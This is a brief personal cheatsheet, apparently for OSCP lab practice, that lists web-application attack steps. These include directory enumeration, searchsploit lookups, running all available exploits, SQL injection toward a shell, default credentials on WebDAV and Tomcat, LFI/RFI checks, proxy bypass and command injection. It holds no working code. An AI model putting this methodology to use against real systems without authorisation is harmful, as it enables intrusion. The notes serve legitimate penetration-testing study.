My little cheatsheet

https://www.blakejarvis.com/oscp/oscp-things-to-try-when-stuck

Run all the enumeration you can:

Enumerate Directories using FeroxBuster and Dirsearch including the name of the box. /shenzi/

Enumerate for multiple shellshock scripts.

nikto

Examine the source code and look for maybe APIs that you could use.

Remember to use curl and BurpSuite to change Request Types and see if there is any sort of unusual response.

If the website is 404 or 403 protected see if you can bypass if there is any ip blocking.

If you can identify a CMS look it up on searchsploit and identify vulnerabilities.

If you dont know the version but know that therer is indeed exploits available run them all.

If you cant identify a cms it probably means that it is made on their own to be exploitable on purpose.

This means that there is multiple things you should do.

Check for SQL injection, this you should go straight to the section in this blog, depending if there is a sql version chcekc if we can enable a shell.

if the application is running webdav check for possible credentials and try the default credentials.

If we come over with Tomcat check for the credentials to upload a file.

If there is a parameter that calls to a file check for possible rfi and lfi, use kadimus to check for possible lfi vulerabilities and lfisuite.

Check cookies and different parameters to check for elevation

If the website is a proxy chekc for possible bypasses using spose

if there is a wordpress site check for creds.

Check for node.js RCE

check for possible parameters that could be used for command injection like in hetemit.

If there is a login page look at the other section for that.